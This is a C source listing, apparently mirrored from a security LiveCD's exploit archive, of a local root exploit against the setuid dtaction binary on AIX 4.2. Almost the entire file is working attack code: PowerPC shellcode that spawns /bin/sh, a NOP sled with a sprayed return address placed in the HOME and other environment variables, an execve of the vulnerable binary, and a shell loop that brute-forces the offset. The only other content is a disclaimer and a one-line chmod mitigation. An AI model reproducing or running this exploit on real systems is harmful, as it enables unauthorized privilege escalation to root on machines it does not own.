home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / dtaction.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  5KB  |  180 lines

  1. /*
  2.  AIX 4.2,(others?) dtaction and HOME exploit by Georgi Guninski
  3. ----------------------------------------
  4. DISCLAIMER
  5.  
  6.  This program is for educational purpose ONLY. Do not use it without
  7. permission.
  8.  The usual standard disclaimer applies, especially the fact that Georgi
  9. Guninski
  10.  is not liable for any damages caused by direct or  indirect use of
  11.  the information or functionality provided by this program.
  12.  Georgi Guninski, his employer or any Internet provider bears NO
  13. responsibility for content
  14.  or misuse of this program or any derivatives thereof.
  15.  By using this program you accept the fact that any damage (dataloss,
  16. system
  17.  crash, system compromise, etc.) caused by the use of this program is not
  18.  Georgi Guninski's responsibility.
  19.  
  20. In case you distribute this, please keep the disclaimer and my addresses.
  21. -----------------------------------------
  22. Use the IBM C compiler.
  23. Compile with: cc -g aixdtaction.c
  24. DISPLAY should be set.
  25. SOLUTION: #chmod -s /usr/dt/bin/dtaction                ; at least stops root shells
  26. -----------------
  27. Georgi Guninski
  28.  guninski@hotmail.com
  29. */
  30.  
  31. #include <stdio.h>
  32. #include <stdlib.h>
  33. #include <string.h>
  34.  
  35.  
  36. char *prog="/usr/dt/bin/dtaction";
  37. char *prog2="dtaction";
  38. extern int execv();
  39.  
  40. char *createvar(char *name,char *value)
  41. {
  42.   char *c;
  43.   int l;
  44.   l=strlen(name)+strlen(value)+4;
  45.   if (! (c=malloc(l)))
  46.     {
  47.       perror("error allocating");
  48.       exit(2);
  49.     };
  50.   strcpy(c,name);
  51.   strcat(c,"=");
  52.   strcat(c,value);
  53.   return c;
  54. }
  55.  
  56. /*The program*/
  57. main(int argc,char **argv,char **env)
  58. {
  59.   /*The code*/
  60.   unsigned int code[]={
  61.     0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  62.     0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  63.     0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  64.     0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  65.     0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  66.     0x7c0903a6 , 0x4e800420, 0x0
  67.   };
  68.   /* disassembly
  69.   7c0802a6        mfspr   r0,LR
  70.   9421fbb0        stu     SP,-1104(SP) --get stack
  71.   90010458        st      r0,1112(SP)
  72.   3c60f019        cau     r3,r0,0xf019
  73.   60632c48        lis     r3,r3,11336
  74.   90610440        st      r3,1088(SP)
  75.   3c60d002        cau     r3,r0,0xd002
  76.   60634c0c        lis     r3,r3,19468
  77.   90610444        st      r3,1092(SP)
  78.   3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  79.   6063696e        lis     r3,r3,26990
  80.   90610438        st      r3,1080(SP)
  81.   3c602f73        cau     r3,r0,0x2f73
  82.   60636801        lis     r3,r3,26625
  83.   3863ffff        addi    r3,r3,-1
  84.   9061043c        st      r3,1084(SP) --terminate with 0
  85.   30610438        lis     r3,SP,1080
  86.   7c842278        xor     r4,r4,r4    --argv=NULL
  87.   80410440        lwz     RTOC,1088(SP)
  88.   80010444        lwz     r0,1092(SP) --jump
  89.   7c0903a6        mtspr   CTR,r0
  90.   4e800420        bctr              --jump
  91.   */
  92.  
  93. #define MAXBUF 600
  94.   unsigned int buf[MAXBUF];
  95.   unsigned int frame[MAXBUF];
  96.   unsigned int i,nop,mn=100;
  97.   int max=280;
  98.   unsigned int toc;
  99.   unsigned int eco;
  100.   unsigned int *pt;
  101.   char *t;
  102.   unsigned int reta; /* return address */
  103.   int corr=3400;
  104.   char *args[4];
  105.   char *newenv[8];
  106.  
  107.  
  108.   if (argc>1)
  109.     corr = atoi(argv[1]);
  110.  
  111.   pt=(unsigned *) &execv;
  112.   toc=*(pt+1);
  113.   eco=*pt;
  114.  
  115.   if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
  116.     {
  117.       perror("Bad parameters");
  118.       exit(1);
  119.     }
  120.  
  121. #define OO 7
  122.   *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
  123.   *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
  124.   *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
  125.   *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
  126.                                       0x0000ffff);
  127.  
  128.   reta=(unsigned) &buf[0]+corr;
  129.  
  130.   for(nop=0;nop<mn;nop++)
  131.     buf[nop]=0x4ffffb82;
  132.   strcpy((char*)&buf[nop],(char*)&code);
  133.   i=nop+strlen( (char*) &code)/4-1;
  134.  
  135.   if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
  136.       || !(reta && 0xff000000))
  137.     {
  138.       perror("Return address has zero");
  139.       exit(5);
  140.     }
  141.  
  142.   while(i++<max)
  143.     buf[i]=reta;
  144.   buf[i]=0;
  145.  
  146.   for(i=0;i<max-1;i++)
  147.     frame[i]=reta;
  148.   frame[i]=0;
  149.  
  150.   /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
  151.   newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  152.   newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  153.   newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  154.   newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  155.   newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  156.   newenv[5]=createvar("HOME",(char*)&frame[0]);
  157.   newenv[6]=NULL;
  158.  
  159.   args[0]=prog2;
  160.   puts("Start...");/*Here we go*/
  161.   execve(prog,args,newenv);
  162.   perror("Error executing execve \n");
  163.   /*      Georgi Guninski guninski@hotmail.com
  164.           http://www.geocities.com/ResearchTriangle/1711*/
  165. }
  166.  
  167. /*
  168. -brute-script----------------------------------------------------------
  169. #!/bin/ksh
  170. L=200
  171. O=40
  172. while [ $L -lt 12000 ]
  173. do
  174. echo $L
  175. L=`expr $L + 96`
  176. ./a.out $L
  177. done
  178. */
  179.  
  180. /*                    www.hack.co.za              [2000]*/